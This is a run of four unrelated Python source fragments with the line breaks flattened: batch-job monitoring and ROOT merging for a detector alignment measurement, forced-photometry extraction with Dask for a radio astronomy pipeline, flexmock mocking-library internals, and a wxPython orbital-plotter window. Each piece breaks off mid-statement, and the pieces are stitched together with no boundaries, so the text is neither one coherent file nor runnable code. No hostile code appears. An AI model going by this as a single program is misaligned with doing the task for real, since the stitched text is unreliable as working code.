"{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}_{}_error.txt".format(base, self.name,self.curIteration,number) foundErr = False with open(errFile, "r") as err: for line in err: if "Fatal Exception" in line.strip(): foundErr = True break if foundErr: print("Job {} in iteration {} of APE measurement {} has failed".format(job, self.curIteration, self.name)) self.failedJobs.append(job) else: print("Job {} in iteration {} of APE measurement {} has just finished".format(job, self.curIteration, self.name)) elif "EXIT" in jobState: print("Job {} in iteration {} of APE measurement {} has failed".format(job, self.curIteration, self.name)) self.failedJobs.append(job) elif "RUN" in jobState or "PEND" in jobState: stillRunningJobs.append((job, number)) elif "Job <{}> is not found".format(job) in jobState: print("Job {} of APE measurement was not found in queue, so it is assumed that it successfully finished long ago.".format(job, self.name)) elif len(jobState) == 0: print("Running on environment that does not know bjobs command or ssh session is timed out (ongoing for longer than 24h?), exiting") sys.exit() else: print("Unknown state {}, marking job {} of APE measurement {} as failed".format(jobState, job, self.name)) self.failedJobs.append(job) self.runningJobs = stillRunningJobs # at least one job failed if len(self.failedJobs) > 0: self.status = STATE_BJOBS_FAILED self.finishTime = subprocess.check_output(["date"]).strip() elif len(self.runningJobs) == 0: self.status = STATE_BJOBS_DONE print("All batch jobs of APE measurement {} in iteration {} are done".format(self.name, self.curIteration)) if lastStatus != self.status: self.print_status() def do_merge(self): self.status = STATE_MERGE_WAITING if self.alignment.isDesign: folderName = '{}/hists/{}/baseline'.format(base, self.name) else: folderName = '{}/hists/{}/iter{}'.format(base, self.name, self.curIteration) # (re)move results from previous measurements before creating folder if os.path.isdir(folderName): if os.path.isdir(folderName+"_old"): shutil.rmtree("{}_old".format(folderName)) os.rename(folderName, folderName+"_old") os.makedirs(folderName) # This is so that the structure of the tree can be retrieved by ApeEstimatorSummary.cc and the tree does not have to be rebuilt if self.curIteration > 0 and not self.alignment.isDesign: # don't have to check for isDesign here because it always ends after iteration 0... shutil.copyfile('{}/hists/{}/iter{}/allData_iterationApe.root'.format(base, self.name, self.curIteration-1),folderName+"/allData_iterationApe.root") fileNames = ['{}/hists/{}/{}{}.root'.format(base, self.name, self.dataset.sampleType, str(i)) for i in range(1, self.dataset.nFiles+1)] fileString = " ".join(fileNames) from autoSubmitterTemplates import mergeTemplate merge_result = subprocess.call(mergeTemplate.format(path=folderName, inputFiles=fileString), shell=True) # returns exit code (0 if no error occured) for name in fileNames: os.remove(name) if os.path.isfile("{}/allData.root".format(folderName)) and merge_result == 0: # maybe check with ROOT if all neccessary contents are in? self.status = STATE_MERGE_DONE else: self.status = STATE_MERGE_FAILED self.finishTime = subprocess.check_output(["date"]).strip() self.print_status() def do_summary(self): self.status = STATE_SUMMARY_WAITING from autoSubmitterTemplates import summaryTemplate if self.alignment.isDesign: #use measurement name as baseline folder name in this case inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.name) else: inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.alignment.baselineDir) summary_result = subprocess.call(summaryTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured) if summary_result == 0: self.status = STATE_SUMMARY_DONE else: self.status = STATE_SUMMARY_FAILED self.finishTime
import os import logging import datetime import numpy as np import pandas as pd import dask.dataframe as dd import dask.bag as db from psutil import cpu_count from glob import glob from astropy import units as u from astropy.coordinates import SkyCoord from django.conf import settings from django.db import transaction from pyarrow.parquet import read_schema from typing import List, Tuple, Dict from vast_pipeline.models import Image, Measurement, Run from vast_pipeline.pipeline.loading import make_upload_measurements from forced_phot import ForcedPhot from ..utils.utils import StopWatch logger = logging.getLogger(__name__) def remove_forced_meas(run_path: str) -> None: ''' Remove forced measurements from the database if forced parquet files are found. Args: run_path: The run path of the pipeline run. Returns: None ''' path_glob = glob( os.path.join(run_path, 'forced_measurements_*.parquet') ) if path_glob: ids = ( dd.read_parquet(path_glob, columns='id') .values .compute() .tolist() ) obj_to_delete = Measurement.objects.filter(id__in=ids) del ids if obj_to_delete.exists(): with transaction.atomic(): n_del, detail_del = obj_to_delete.delete() logger.info( ('Deleting all previous forced measurement and association' ' objects for this run. Total objects deleted: %i'), n_del, ) logger.debug('(type, #deleted): %s', detail_del) def get_data_from_parquet( file: str, p_run_path: str, add_mode: bool = False,) -> Dict: ''' Get the prefix, max id and image id from the measurements parquets Args: file: a string with the path of the measurements parquet file p_run_path: Pipeline run path to get forced parquet in case of add mode. add_mode: Whether image add mode is being used where the forced parquet needs to be used instead. Returns: Dictionary with prefix string, an interger max_id and a string with the id of the image ''' if add_mode: image_name = file.split("/")[-2] forced_parquet = os.path.join( p_run_path, f"forced_measurements_{image_name}.parquet" ) if os.path.isfile(forced_parquet): file = forced_parquet # get max component id from parquet file df = pd.read_parquet(file, columns=['island_id', 'image_id']) prefix = df['island_id'].iloc[0].rsplit('_', maxsplit=1)[0] + '_' max_id = ( df['island_id'].str.rsplit('_', n=1) .str.get(-1) .astype(int) .values.max() + 1 ) return {'prefix': prefix, 'max_id': max_id, 'id': df['image_id'].iloc[0]} def extract_from_image( df: pd.DataFrame, image: str, background: str, noise: str, edge_buffer: float, cluster_threshold: float, allow_nan: bool ) -> Dict: """ Extract the flux, its erros and chi squared data from the image files (image FIT, background and noise files) and return a dictionary with the dataframe and image name Args: df: input dataframe with columns [source_tmp_id, wavg_ra, wavg_dec, image_name, flux_peak] image: a string with the path of the image FIT file background: a string with the path of the image background file noise: a string with the path of the image noise file edge_buffer: flag to pass to ForcedPhot.measure method cluster_threshold: flag to pass to ForcedPhot.measure method allow_nan: flag to pass to ForcedPhot.measure method Returns: Dictionary with input dataframe with added columns (flux_int, flux_int_err, chi_squared_fit) and image name. """ # create the skycoord obj to pass to the forced extraction # see usage https://github.com/dlakaplan/forced_phot P_islands = SkyCoord( df['wavg_ra'].values, df['wavg_dec'].values, unit=(u.deg, u.deg) ) FP = ForcedPhot(image, background, noise) flux, flux_err, chisq, DOF, cluster_id = FP.measure( P_islands, cluster_threshold=cluster_threshold, allow_nan=allow_nan, edge_buffer=edge_buffer ) df['flux_int'] = flux * 1.e3 df['flux_int_err'] = flux_err * 1.e3 df['chi_squared_fit'] = chisq return {'df': df, 'image': df['image_name'].iloc[0]} def finalise_forced_dfs( df: pd.DataFrame, prefix: str, max_id: int, beam_bmaj: float, beam_bmin: float, beam_bpa: float, id: int, datetime: datetime.datetime, image: str ) -> pd.DataFrame: """ Compute populate leftover columns for the dataframe with forced photometry data given the input parameters Args: df: input dataframe with columns [source_tmp_id, wavg_ra, wavg_dec, image_name, flux_peak, flux_int, flux_int_err, chi_squared_fit] prefix: string to use to generate the 'island_id' column max_id: integer to use to generate the 'island_id' column beam_bmaj: image beam major axis beam_bmin: image beam minor axis beam_bpa: image beam position angle id: image id in database datetime: timestamp of the image file (from header) image: string with the image name Returns: Input dataframe with added columns island_id, component_id, name, bmaj, bmin, pa, image_id, time. """ # make up the measurements name from the image island_id and component_id df['island_id'] = np.char.add( prefix, np.arange(max_id, max_id + df.shape[0]).astype(str) ) df['component_id'] = df['island_id'].str.replace( 'island', 'component' ) + 'a' img_prefix = image.split('.')[0] + '_' df['name'] = img_prefix + df['component_id'] # assign all the other columns # convert fluxes to mJy # store source bmaj and bmin in arcsec df['bmaj'] = beam_bmaj * 3600. df['bmin'] = beam_bmin * 3600. df['pa'] = beam_bpa # add image id and time df['image_id'] = id df['time'] = datetime return df def parallel_extraction( df: pd.DataFrame, df_images: pd.DataFrame, df_sources: pd.DataFrame, min_sigma: float, edge_buffer: float, cluster_threshold: float, allow_nan: bool, add_mode: bool, p_run_path: str ) -> pd.DataFrame: """ Parallelize forced extraction with Dask Args: df: dataframe with columns 'wavg_ra', 'wavg_dec', 'img_diff', 'detection' df_images: dataframe with the images data and columns 'id', 'measurements_path', 'path', 'noise_path', 'beam_bmaj', 'beam_bmin', 'beam_bpa', 'background_path', 'rms_min', 'datetime', 'skyreg__centre_ra', 'skyreg__centre_dec', 'skyreg__xtr_radius' and 'name' as the index. df_sources: dataframe derived from the measurement data with columns 'source', 'image', 'flux_peak'. min_sigma: minimum sigma value to drop forced extracted measurements. edge_buffer: flag to pass to ForcedPhot.measure method. cluster_threshold: flag to pass to ForcedPhot.measure method. allow_nan: flag to pass to ForcedPhot.measure method. add_mode: True when the pipeline is running in add image mode. p_run_path: The system path of the pipeline run output. Returns: Dataframe with forced extracted measurements data, columns are 'source_tmp_id', 'ra', 'dec', 'image', 'flux_peak', 'island_id', 'component_id', 'name', 'flux_int', 'flux_int_err' """ # explode the lists in 'img_diff' column (this will make a copy of the df) out = ( df.rename(columns={'img_diff':'image', 'source':'source_tmp_id'}) # merge the rms_min column from df_images .merge( df_images[['rms_min']], left_on='image', right_on='name', how='left' ) .rename(columns={'rms_min': 'image_rms_min'}) # merge the measurements columns 'source', 'image', 'flux_peak' .merge( df_sources, left_on=['source_tmp_id', 'detection'], right_on=['source', 'image'], how='left' ) .drop(columns=['image_y', 'source']) .rename(columns={'image_x': 'image'}) ) # drop the source for which we would have no hope of detecting predrop_shape = out.shape[0] out['max_snr'] = out['flux_peak'].values / out['image_rms_min'].values out = out[out['max_snr'] > min_sigma].reset_index(drop=True) logger.debug("Min forced sigma dropped %i sources", predrop_shape - out.shape[0] ) # drop some columns that are no longer needed and the df should look like # out # | | source_tmp_id | wavg_ra | wavg_dec | image_name | flux_peak | # |--:|--------------:|--------:|---------:|:-----------------|----------:| # | 0 | 81 | 317.607 | -8.66952 | VAST_2118-06A... | 11.555 | # | 1 | 894 | 323.803 | -2.6899 | VAST_2118-06A... | 2.178 | # | 2 | 1076 | 316.147 | -3.11408 | VAST_2118-06A... | 6.815 | # | 3 | 1353 | 322.094 | -4.44977 | VAST_2118-06A... | 1.879 | # | 4 | 1387 | 321.734 | -6.82934 | VAST_2118-06A... | 1.61 | out = ( out.drop(['max_snr', 'image_rms_min', 'detection'], axis=1) .rename(columns={'image': 'image_name'}) ) # get the unique images to extract from unique_images_to_extract = out['image_name'].unique().tolist() # create a list of dictionaries with image file paths and dataframes # with data related to each images image_data_func = lambda x: { 'image': df_images.at[x, 'path'], 'background': df_images.at[x, 'background_path'], 'noise': df_images.at[x, 'noise_path'], 'df': out[out['image_name'] == x] } list_to_map = list(map(image_data_func, unique_images_to_extract)) # create a list of all the measurements parquet files to extract data from, # such as prefix and max_id list_meas_parquets = list(map( lambda el: df_images.at[el, 'measurements_path'], unique_images_to_extract )) del out, unique_images_to_extract, image_data_func # get a map of the columns that have a fixed value mapping = ( db.from_sequence( list_meas_parquets, npartitions=len(list_meas_parquets) ) .map(get_data_from_parquet, p_run_path, add_mode) .compute() ) mapping = pd.DataFrame(mapping) # remove not used columns from images_df and merge into mapping col_to_drop = list(filter( lambda x: ('path' in x) or ('skyreg' in x), df_images.columns.values.tolist() )) mapping = ( mapping.merge( df_images.drop(col_to_drop, axis=1).reset_index(), on='id', how='left' ) .drop('rms_min', axis=1) .set_index('name') ) del col_to_drop n_cpu = cpu_count() - 1 bags = db.from_sequence(list_to_map, npartitions=len(list_to_map)) forced_dfs = ( bags.map(lambda x: extract_from_image( edge_buffer=edge_buffer, cluster_threshold=cluster_threshold, allow_nan=allow_nan, **x )) .compute() ) del bags # create intermediates dfs combining the mapping data and the forced # extracted data from the images intermediate_df = list(map( lambda x: {**(mapping.loc[x['image'], :].to_dict()), **x}, forced_dfs )) # compute the rest of the columns intermediate_df = ( db.from_sequence(intermediate_df) .map(lambda x: finalise_forced_dfs(**x)) .compute() ) df_out = ( pd.concat(intermediate_df, axis=0, sort=False) .rename( columns={ 'wavg_ra':'ra', 'wavg_dec':'dec', 'image_name': 'image' } ) ) return df_out def write_group_to_parquet( df: pd.DataFrame, fname: str, add_mode: bool) -> None: ''' Write a dataframe correpondent to a single group/image to a parquet file. Args: df: Dataframe
{expected.__name__}:\n" f" Expected message:\n\t'{message}'\n" f" Received message:\n\t'{expected_message}'" ) ) elif expected is not raised: raise ExceptionClassError( f"Raised exception for call {expectation._name} " f"did not match expectation:\n" f" Expected:\t{repr(expected)}\n" f" Raised:\t{raised}\n\n" "Did you try to call and_raise with an instance?\n" 'Instead of and_raise(Exception("arg")), try and_raise(Exception, "arg")' ) else: raise def match_return_values(expected: Any, received: Any) -> bool: if not isinstance(expected, tuple): expected = (expected,) if not isinstance(received, tuple): received = (received,) if len(received) != len(expected): return False for i, val in enumerate(received): if not _arguments_match(val, expected[i]): return False return True def pass_thru( expectation: Expectation, runtime_self: Any, *kargs: Any, **kwargs: Any ) -> Any: return_values = None try: original = _getattr(expectation, "_original") _mock = _getattr(expectation, "_mock") if inspect.isclass(_mock): if expectation._method_type in SPECIAL_METHODS: original = _getattr(expectation, "_original_function") return_values = original(*kargs, **kwargs) else: return_values = original(runtime_self, *kargs, **kwargs) else: return_values = original(*kargs, **kwargs) except Exception: return _handle_exception_matching(expectation) expected_values = _getattr(expectation, "_return_values") if expected_values and not match_return_values(expected_values[0].value, return_values): expected_value = expected_values[0].value # Display strings with quotes in the error message if isinstance(return_values, str): return_values = repr(return_values) if isinstance(expected_value, str): expected_value = repr(expected_value) raise ( MethodSignatureError( f"Returned values for call {expectation._name} did not match expectation:\n" f" Expected:\t{expected_value}\n" f" Returned:\t{return_values}" ) ) return return_values def _handle_matched_expectation( expectation: Expectation, runtime_self: Any, *kargs: Any, **kwargs: Any ) -> Any: if not expectation._runnable(): raise StateError( f"{name} expected to be called when {expectation._get_runnable()} is True" ) expectation._times_called += 1 expectation._verify(final=False) _pass_thru = _getattr(expectation, "_pass_thru") _replace_with = _getattr(expectation, "_replace_with") if _pass_thru: return pass_thru(expectation, runtime_self, *kargs, **kwargs) if _replace_with: return _replace_with(*kargs, **kwargs) return_values = _getattr(expectation, "_return_values") if return_values: return_value = return_values[0] del return_values[0] return_values.append(return_value) else: return_value = ReturnValue() if return_value.raises: if inspect.isclass(return_value.raises): raise return_value.raises( *return_value.value["kargs"], **return_value.value["kwargs"] ) raise return_value.raises # pylint: disable=raising-bad-type return return_value.value def mock_method(runtime_self: Any, *kargs: Any, **kwargs: Any) -> Any: arguments = {"kargs": kargs, "kwargs": kwargs} expectation = FlexmockContainer.get_flexmock_expectation(self, name, arguments) if expectation: return _handle_matched_expectation(expectation, runtime_self, *kargs, **kwargs) # inform the user which expectation(s) for the method were _not_ matched saved_expectations = reversed(FlexmockContainer.get_expectations_with_name(self, name)) error_msg = ( f"Arguments for call {name} did not match expectations:\n" f" Received call:\t{_format_args(name, arguments)}\n" ) if saved_expectations: error_msg += "\n".join( f" Expected call[{index}]:\t{_format_args(name, expectation._args)}" for index, expectation in enumerate(saved_expectations, 1) ) raise MethodSignatureError(error_msg) return mock_method def flexmock_teardown() -> None: """Performs flexmock-specific teardown tasks.""" saved = {} instances = [] classes = [] for mock_object, expectations in FlexmockContainer.flexmock_objects.items(): saved[mock_object] = expectations[:] for expectation in expectations: _getattr(expectation, "_reset")() for expectation in expectations: # Remove method type attributes set by flexmock. This needs to be done after # resetting all the expectations because method type is needed in expectation teardown. if inspect.isclass(mock_object) or hasattr(mock_object, "__class__"): try: delattr(mock_object._object, f"{expectation._name}__flexmock__method_type") except (AttributeError, TypeError): pass for mock in saved: obj = mock._object if not isinstance(obj, Mock) and not inspect.isclass(obj): instances.append(obj) if inspect.isclass(obj): classes.append(obj) for obj in instances + classes: for attr in UPDATED_ATTRS: try: obj_dict = obj.__dict__ if obj_dict[attr].__code__ is Mock.__dict__[attr].__code__: del obj_dict[attr] except Exception: try: if getattr(obj, attr).__code__ is Mock.__dict__[attr].__code__: delattr(obj, attr) except AttributeError: pass FlexmockContainer.teardown_properties() FlexmockContainer.reset() # make sure this is done last to keep exceptions here from breaking # any of the previous steps that cleanup all the changes for mock_object, expectations in saved.items(): for expectation in expectations: _getattr(expectation, "_verify")() class Expectation: """Holds expectations about methods. The information contained in the Expectation object includes method name, its argument list, return values, and any exceptions that the method might raise. """ def __init__( self, mock: Mock, name: Optional[str] = None, return_value: Optional[Any] = None, original: Optional[Any] = None, method_type: Optional[Any] = None, ) -> None: if original is not None: self._original = original self._name = name self._times_called: int = 0 self._modifier: str = EXACTLY self._args: Optional[Dict[str, Any]] = None self._method_type = method_type self._argspec: Optional[inspect.FullArgSpec] = None self._return_values = [ReturnValue(return_value)] if return_value is not None else [] self._replace_with: Optional[Callable[..., Any]] = None self._original_function: Optional[Callable[..., Any]] = None self._expected_calls = {EXACTLY: None, AT_LEAST: None, AT_MOST: None} self._runnable: Callable[..., bool] = lambda: True self._mock = mock self._pass_thru = False self._ordered = False self._one_by_one = False self._verified = False self._callable = True self._local_override = False def __str__(self) -> str: args = _format_args(str(self._name), self._args) return_values = ", ".join(str(x) for x in self._return_values) return f"{args} -> ({return_values})" def __call__(self) -> "Expectation": return self def __getattribute__(self, name: str) -> Any: if name == "once": return _getattr(self, "times")(1) if name == "twice": return _getattr(self, "times")(2) if name == "never": return _getattr(self, "times")(0) if name in ("at_least", "at_most", "ordered", "one_by_one"): return _getattr(self, name)() if name == "mock": return _getattr(self, "mock")() return _getattr(self, name) def __getattr__(self, name: str) -> NoReturn: self.__raise( AttributeError, f"'{self.__class__.__name__}' object has not attribute '{name}'" ) def _get_runnable(self) -> str: """Ugly hack to get the name of when() condition from the source code.""" name = "condition" try: source = inspect.getsource(self._runnable) if "when(" in source: name = source.split("when(")[1].split(")")[0] elif "def " in source: name = source.split("def ")[1].split("(")[0] except Exception: # couldn't get the source, oh well pass return name def _verify_signature_match(self, *kargs: Any, **kwargs: Any) -> None: if isinstance(self._mock, Mock): return # no sense in enforcing this for fake objects allowed = self._argspec args_len = len(allowed.args) # self is the first expected argument has_self = allowed.args and allowed.args[0] == "self" # Builtin methods take `self` as the first argument but `inspect.ismethod` returns False # so we need to check for them explicitly is_builtin_method = isinstance(self._original, BuiltinMethodType) and has_self # Methods take `self` if not a staticmethod is_method = inspect.ismethod(self._original) and self._method_type is not staticmethod # Class init takes `self` is_class = inspect.isclass(self._original) # When calling class methods or instance methods on a class method takes `cls` is_class_method = ( inspect.isfunction(self._original) and inspect.isclass(self._mock) and self._method_type is not staticmethod ) if is_builtin_method or is_method or is_class or is_class_method: # Do not count `self` or `cls`. args_len -= 1 minimum = args_len - (allowed.defaults and len(allowed.defaults) or 0) maximum = None if allowed.varargs is None and allowed.varkw is None: maximum = args_len total_positional = len(kargs + tuple(a for a in kwargs if a in allowed.args)) named_optionals = [ a for a in kwargs if allowed.defaults if a in allowed.args[len(allowed.args) - len(allowed.defaults) :] ] if allowed.defaults and total_positional == minimum and named_optionals: minimum += len(named_optionals) if total_positional < minimum: arguments = "argument" if minimum == 1 else "arguments" raise MethodSignatureError( f"{self._name} requires at least {minimum} {arguments}, " f"expectation provided {total_positional}" ) if maximum is not None and total_positional > maximum: arguments = "argument" if maximum == 1 else "arguments" raise MethodSignatureError( f"{self._name} requires at most {maximum} {arguments}, " f"expectation provided {total_positional}" ) if args_len == len(kargs) and any(a for a in kwargs if a in allowed.args): given_args = [a for a in kwargs if a in allowed.args] arguments = "argument" if len(given_args) == 1 else "arguments" raise MethodSignatureError( f"{given_args} already given as positional {arguments} to {self._name}" ) if not allowed.varkw and any( a for a in kwargs if a not in allowed.args + allowed.kwonlyargs ): invalid_arg = [a for a in kwargs if a not in allowed.args + allowed.kwonlyargs][0] raise MethodSignatureError( f"{invalid_arg} is not a valid keyword argument to {self._name}" ) # check that kwonlyargs that don't have default value specified are provided required_kwonlyargs = [ a for a in allowed.kwonlyargs if a not in (allowed.kwonlydefaults or {}) ] missing_kwonlyargs = [a for a in required_kwonlyargs if a not in kwargs] if missing_kwonlyargs: arguments = "argument" if len(missing_kwonlyargs) == 1 else "arguments" missing_args = '", "'.join(missing_kwonlyargs) raise MethodSignatureError( f'{self._name} requires keyword-only {arguments} "{missing_args}"' ) def _update_original(self, name: str, obj: Any) -> None: if hasattr(obj, "__dict__") and name in obj.__dict__: self._original = obj.__dict__[name] else: self._original = getattr(obj, name) self._update_argspec() def _update_argspec(self) -> None: original = self.__dict__.get("_original") if original: try: self._argspec = inspect.getfullargspec(original) except TypeError: # built-in function: fall back to stupid processing and hope the # builtins don't change signature pass def _normalize_named_args(self, *kargs: Any, **kwargs: Any) -> Dict[str, Any]: argspec = self._argspec default =
#!/bin/sh # -*- coding:utf-8 import os #import psutil # downloaded from http://code.google.com/p/psutil/downloads/detail?name=psutil-1.0.1.win32-py2.7.exe&can=2&q= import wxversion wxversion.select("2.8") import wx # import FU modules import fumodel import view import const import lib import molec import graph from numpy import * try: import fucubelib except: pass class DrawOrbital(): def __init__(self,parent,model,viewer): self.parent=parent self.model=model self.viewer=viewer self.orbitallst=[] def OpenDrawWin(self,orbitallst): self.draworb=DrawOrbital_Frm(self.parent,-1,self.parent,self.viewer,orbitallst=orbitallst) def SetOrbitalList(self,orbitallst): self.orbitallst=orbitallst def SetMode(self,mode): self.mode=mode def SetViewer(self,viewer): self.viewer=viewer class DrawOrbital_Frm(wx.MiniFrame): def __init__(self,parent,id,model,viewer,mode=0,winpos=[-1,-1], orbitallst=[]): #,model,ctrlflag,molnam,winpos): """ :param obj parent: parent object :param int id: object id :param obj model: an instance of "Model" (model.py) :param obj viewer: viewer instance :param int mode: 0 for stand alone, 1 for child (no menu) """ self.title='Orbital plotter' self.orbitallst=orbitallst self.magnify=False ###self.orbitallst=[[[-20,-15,-10,5,10,15]],[[-50,-20,-15,-10,5,10,15],[-15,-10,-5,8,10,12]]] #self.orbitallst=[[[-20,-15,-10,5,10,15]]] norbpanel=len(self.orbitallst) #if norbpanel <= 0: norbpanel=1 self.orbitalpanwidth=115 winwidth=100+8+norbpanel*self.orbitalpanwidth if norbpanel <= 0: winwidth=110 winsize=lib.MiniWinSize([winwidth,340]) #([100,355]) self.norbpanel=norbpanel wx.MiniFrame.__init__(self,parent,id,self.title,pos=winpos,size=winsize, style=wx.SYSTEM_MENU|wx.CAPTION|wx.CLOSE_BOX|wx.FRAME_FLOAT_ON_PARENT) self.parent=parent self.mode=mode if mode == 1: self.viewer=viewer #self.SetTransparent(100) self.model=model # model #parent.model #self.mdlwin=model.mdlwin #self.draw=self.mdlwin.draw #self.ctrlflag=model.ctrlflag self.ctrlflag={} """ need codes """ self.homoorbnmblst=self.norbpanel*[3] self.maxorbnmblst=self.norbpanel*[20] self.plotterpanwidth=100 self.orbitalpanwidth=115 self.orbpanel=self.norbpanel*[None] self.orbtitle=self.norbpanel*['orbiatl'] self.orbgraph=self.norbpanel*[None] self.orbcheck=self.norbpanel*[None] self.lumoplus=self.norbpanel*[0] self.minlumo=self.norbpanel*[0] self.maxlumo=self.norbpanel*[50] self.homominus=self.norbpanel*[0] self.minhomo=self.norbpanel*[0] self.maxhomo=self.norbpanel*[50] self.spin=self.norbpanel*[''] self.widgetiddic={} self.curdata=0 self.erangemin=-15.0 self.erangemax=5.0 # menu if self.mode == 0: menud=self.MenuItems() # method of MyModel class # Create menu using model.fuMenu class self.menubar=self.MenuItems() # create instance of fuMenu class self.SetMenuBar(self.menubar) # method of wxFrame class self.Bind(wx.EVT_MENU,self.OnMenu) # self.bgcolor='light gray' #self.cubedataname=[] nulobj=CubeObj() self.denobjdic={}; self.denobjdic[' ']=nulobj self.denobjlst=[] #[' ','den-cube-1','den-cube-2','den-cube-3'] self.mepobjdic={}; self.mepobjdic[' ']=nulobj self.mepobjlst=[] #[' ','mep-cube-1','mep-cube-2','mep-cube-3'] self.cubeobjdic={}; self.cubeobjdic[' ']=nulobj self.cubeobjlst=[] self.curden=' ' self.curmep=' ' self.curcube=' ' #self.cubefile='' self.prptxt=['DENSITY','MEP','CUBE'] self.property=0 self.style=0 # 0:solid, 1:mesh self.ondraw=False self.superimpose=False self.xcubemin=0.0; self.xcubemax=0.0 self.ycubemin=0.0; self.ycubemax=0.0 self.zcubemin=0.0; self.zcubemax=0.0 self.xcubecnt=0.0; self.ycubecnt=0.0; self.zcubecnt=0.0 self.valuemin=0.0; self.valuemax=0.0 self.nx=0; self.ny=0; self.nz=0 # params for draw self.xmin=-1; self.xmax=-1 self.ymin=-1; self.ymax=-1 self.zmin=-1; self.zmax=-1 self.value=0.05 self.interpol=1 self.minipo=1 self.maxipo=4 # maximum degree of intepolation for cube data self.opacity=0.5 # 0-1 self.colortxt=['red','magenta','yellow','orange','brown','blue','cyan','green','purple', 'white','gray','black','---','palette'] self.colorpos=self.colortxt[0]; self.rgbpos=const.RGBColor[self.colorpos] self.colorneg=self.colortxt[6]; self.rgbneg=const.RGBColor[self.colorneg] # polygons self.polyg=[] # create panel self.CreatePlotterPanel() for i in range(self.norbpanel): self.CreateOrbitalPanel(i) self.SetParamsToWidgets() # if self.mode == 1: self.GetCubeFileAndMakeCubeObjDic() # self.Show() # initialize view self.InitDrawOrbitalWin() #orbnmb=self.GetOrbitalNumberInTC() #self.SetOrbValueToOrbTC(self.curdata,orbnmb) # activate event handlers self.Bind(wx.EVT_CLOSE,self.OnClose) def InitDrawOrbitalWin(self): self.PlotEnergy() """ need codes for spin and orbital selection in graph """ # #spinobj=self.GetSpinObject(self.cutdata) def OpenInfoPanel(self): pos=self.GetPosition() winpos=pos; winsize=[80,40] self.tcinfo=wx.TextCtrl(None,-1,'',pos=winpos,size=winsize,style=wx.TE_MULTILINE) self.tcinfo.SetBackgroundColour('light gray') self.DispCubeDataInfo() def CreatePlotterPanel(self): size=self.GetClientSize() w=size[0]; h=size[1] w=self.plotterpanwidth hcb=const.HCBOX # height of combobox ff='%5.0f' # upper panel self.panel=wx.Panel(self,-1,pos=(-1,-1),size=(w,h)) #ysize)) self.panel.SetBackgroundColour(self.bgcolor) # cubedata yloc=5; xloc=10 #btninfo=wx.Button(self.panel,wx.ID_ANY,"Data info",pos=(xloc,yloc-2),size=(70,20)) #btninfo.Bind(wx.EVT_BUTTON,self.OnInfo) #btninfo.SetToolTipString('Display plot data information') # style #yloc += 25 ststyle=wx.StaticText(self.panel,-1,label='Style:',pos=(xloc,yloc),size=(35,18)) ststyle.SetToolTipString('Choose drawing style') #yloc += 18 #self.rbtsold=wx.RadioButton(self.panel,-1,"solid",pos=(xloc+10,yloc),size=(45,18), self.rbtsold=wx.RadioButton(self.panel,-1,"solid",pos=(xloc+40,yloc),size=(40,18), style=wx.RB_GROUP) self.rbtsold.Bind(wx.EVT_RADIOBUTTON,self.OnSolid) yloc += 18 #self.rbtwire=wx.RadioButton(self.panel,-1,"wire",pos=(xloc+10,yloc),size=(45,18)) self.rbtwire=wx.RadioButton(self.panel,-1,"wire",pos=(xloc+40,yloc),size=(40,18)) self.rbtwire.Bind(wx.EVT_RADIOBUTTON,self.OnWire) self.rbtsold.SetValue(True) # yloc += 20 wx.StaticText(self.panel,-1,"Value(abs):" ,pos=(xloc,yloc),size=(70,18)) yloc += 20 self.tcval=wx.TextCtrl(self.panel,-1,'',pos=(xloc+10,yloc),size=(70,18), style=wx.TE_PROCESS_ENTER) self.tcval.Bind(wx.EVT_TEXT_ENTER,self.OnValue) self.tcval.SetToolTipString('Input value and "ENTER"') yloc += 25 wx.StaticText(self.panel,-1,"Interp:" ,pos=(xloc,yloc),size=(45,18)) self.spip=wx.SpinCtrl(self.panel,-1,value=str(self.interpol),pos=(xloc+45,yloc),size=(35,18), style=wx.SP_ARROW_KEYS,min=self.minipo,max=self.maxipo) self.spip.Bind(wx.EVT_SPINCTRL,self.OnInterpolate) self.spip.SetToolTipString('Choose interpolation points number.') yloc += 20 wx.StaticText(self.panel,-1,"Color:",pos=(xloc,yloc),size=(55,18)) yloc += 20 wx.StaticText(self.panel,-1,"+",pos=(xloc+5,yloc),size=(10,18)) self.cbcolp=wx.ComboBox(self.panel,-1,'',choices=self.colortxt, \ pos=(xloc+20,yloc-3), size=(60,hcb),style=wx.CB_READONLY) self.cbcolp.Bind(wx.EVT_COMBOBOX,self.OnColorPos) self.cbcolp.SetToolTipString('Choose color for positive value. "---" is dummy') yloc += 25 wx.StaticText(self.panel,-1," -" ,pos=(xloc+5,yloc),size=(10,18)) self.cbcoln=wx.ComboBox(self.panel,-1,'',choices=self.colortxt, \ pos=(xloc+20,yloc-3), size=(60,hcb),style=wx.CB_READONLY) self.cbcoln.Bind(wx.EVT_COMBOBOX,self.OnColorNeg) self.cbcoln.SetToolTipString('Choose color for negative value. "---" is dummy') yloc += 25 wx.StaticText(self.panel,-1,"Opacity:" ,pos=(xloc,yloc),size=(50,18)) self.tcopa=wx.TextCtrl(self.panel,-1,('%4.2f' % self.opacity),pos=(xloc+50,yloc-2),size=(30,18), style=wx.TE_PROCESS_ENTER) self.tcopa.SetToolTipString('Input opacity value (0-1) and "ENETR"') self.tcopa.Bind(wx.EVT_TEXT_ENTER,self.OnOpacity) #self.ckbimp.SetValue(self.superimpose) yloc += 20 wx.StaticLine(self.panel,pos=(-1,yloc),size=(w,2),style=wx.LI_HORIZONTAL) #yloc += 25 yloc += 8 wx.StaticText(self.panel,-1,"Object:" ,pos=(xloc,yloc),size=(50,18)) yloc += 18 self.cmbobj=wx.ComboBox(self.panel,-1,'',choices=self.cubeobjlst, \ pos=(xloc+5,yloc), size=(75,hcb),style=wx.CB_READONLY) self.cmbobj.Bind(wx.EVT_COMBOBOX,self.OnObject) self.cmbobj.SetToolTipString('Choose object for operations') yloc += 25 self.ckbimp=wx.CheckBox(self.panel,-1,"superimpose",pos=(xloc,yloc),size=(120,18)) self.ckbimp.Bind(wx.EVT_CHECKBOX,self.OnSuperimpose) self.ckbimp.SetToolTipString('Check for superimpose objects') yloc += 25 self.btndel=wx.Button(self.panel,wx.ID_ANY,"Del",pos=(xloc,yloc),size=(30,20)) self.btndel.Bind(wx.EVT_BUTTON,self.OnDel) self.btndel.SetToolTipString('Remove object') 